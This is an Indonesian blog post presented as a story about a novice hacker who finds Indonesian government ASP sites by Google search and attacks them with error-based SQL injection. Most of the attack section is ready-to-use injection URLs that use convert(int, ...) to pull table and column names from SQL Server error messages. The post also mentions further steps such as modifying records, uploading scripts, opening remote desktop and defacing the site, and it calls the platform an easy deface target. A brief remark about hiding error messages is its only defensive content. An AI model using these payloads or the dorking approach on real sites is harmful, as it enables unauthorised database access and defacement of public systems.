Diarsipkan di bawah: Hacking and security
Dalam berbagai macam teknik hacking, ternyata sebagian besar justru memanfaatkan pesan kesalahan dari server sasaran. Maka bisa dipastikan bahwa Error justru merupakan petunjuk informasi yang penting bagi sebuah server untuk segera dilakukannya teknik hacking oleh para hacker. Jika para netter biasa, akan sangat kesal dengan adanya error, maka para hacker akan menyambut dengan sukacita errornya sistem tersebut.
Mungkin kita biasa sekali menemui halaman, the page cannot displayed, atau error database, atau seperti screenshoot di bawah ini:
Gambar 1. Error ASP
Mungkin bagi sebagian orang tidak begitu mengerti apa arti error ini dan apa guna error tersebut.. Berikut cuplikan di bawah sangat penting menghindari error. Secara bodhon, error adalah petunjuk kesalahan.. Ya dengan petunjuk kesalahan yang terbaca publik, jelas memungkinkan orang lain mengambil keuntungan dengan error ini.
Seorang hacker newbie yang sedang mencoba-coba situs milik pemerintah dengan menggunakan situs google.com. Dia hanya menggunakan kata kunci sebagai berikut : .go.id .asp
Gambar 2. Browsing situs-situs ber ASP
Kemudian dari hasil pencarian dia, didapat beberapa hasil. Kemudian salah satu situs dia test lagi dengan menggunakan sintaks seperti ini
http://situskorban/index.asp?id=208089
dia ganti menjadi
http://situskorban/index.asp?id=’208089
Maka tampak error sebagai berikut
Gambar 3. Error ASP
Selanjutnya dia melakukan test lanjut dengan melakukan convert type data string ke dalam integer, dimana data tersebut tidak bisa di konvert. Yaitu kata kata “test”.
http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(‘test’));–
Tampak pada error adalah gambar berikut
Gambar 4. Error ASP
Dengan modal error itu dia melanjutkan kembali injectnya. Kali ini dia meng-convert string nama-nama tabel dan kolom yang ada pada database ke dalam integer (yang pasti error), dan kemudian melakukan akses ke dalam rekord database.
http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables));–
Haslinya adalah error berikut
Gambar 5. Error ASP
ya saat ini dia bisa mengerti ada satu tabel bernama tabel : index
Kemudian dia lanjut lagi sampai beberapa nama tabel lagi, singkatnya seperti ini, dengan nama nama tabel : index, entry, sysconstraints. Dia terus mencari informasi sedalam-dalamnya dari database tersebut dengan bermodal ERROR.
http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in(‘index’,'entry’,’sysconstraints’)));–
.
.
.
.
Selanjutnya dia mencoba melakukan akses ke kolom, dalam tabel index.
http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=(‘index’)));–
http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=(‘index’)%20and%20column_name%20not%20in(‘id’)));–
hasilnya adalah
Gambar 6. Error Asp
Cukup sampai disitu? Ya tentang cerita ini bisa berhenti disitu. Tetapi yang jelas kita tahu, dia bisa saja melakukan perintah update database. Atau bahkan mencari kolom user yang kemudian dia mengganti kekuasaan / kemapuan upload script-script kiddies, yang berfungsi untuk melakukan eksploitasi lanjut ke dalam server. Bisa juga dia akhirnya membuka service untuk servis remote desktop connection. Ya modal utama dia adalah ERROR.
Gambar 7. Error ASP
Satu lagi, ternyata, WIndows, ASP dan sql server adalah team bagus dan empuk sebagai sasaran deface..
Belum Ada Tanggapan sejauh ini
Tinggalkan komentar
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <pre> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
